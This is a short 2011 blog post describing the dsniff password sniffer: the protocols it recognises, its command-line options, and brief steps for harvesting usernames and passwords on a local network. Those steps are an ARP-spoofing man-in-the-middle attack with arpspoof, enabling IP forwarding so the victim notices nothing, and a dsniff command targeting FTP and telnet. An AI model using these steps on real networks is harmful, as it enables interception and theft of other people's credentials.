Password Sniffing with “dsniff” on the Local Network March 4, 2011Posted by Tournas Dimitrios in Linux admin tools.
The dsniff tool is a member of the Dsniff suit toolset , it’s an advanced password sniffer that recognizes several different protocols, including TELNET, FTP, SMTP, Post Office Protocol (POP), Internet Message Access Protocol (IMAP), HTTP, CVS, Citrix, Server Message Block (SMB), Oracle, and many others. Whereas other sniffers such as Wireshark will give you tons of additional information about the connection and the individual packets , you use dsniff if all you want are usernames and passwords.
The only argument that dsniff can use is a tcpdump packet-filter expression so that you can specify what kind of traffic you want to sniff for passwords.
|-i interface||Specify the interface to listen on.|
|-p pcapfile||Rather than processing the contents of packets observed upon the
network process the given PCAP capture file.
|-r savefile||Read sniffed sessions from a savefile created with the -w
|-w file||Write sniffed sessions to savefile rather than parsing and
printing them out.
|-m||Enable automatic protocol detection.|
|-t trigger[,…]||Load triggers from a comma-separated list, specified as
port/proto=service (e.g. 80/tcp=http).
|-s snaplen||Analyze at most the first snaplen bytes of each TCP connection,
rather than the default of 1024.
Steps to follow :
- First an MIT attack must be implemented with “arpspoof”
Don’t forget to enable IP forwarding on your host so that the traffic goes through your host . Otherwise victim will lose connectivity . sysctl -w net.ipv4.ip_forward=1
- Now specify protocol to monitor
# dsniff -t 21/tcp=ftp,23/tcp=telnet -n
Alternative tools to “dsniff” are : ngrep and ettercap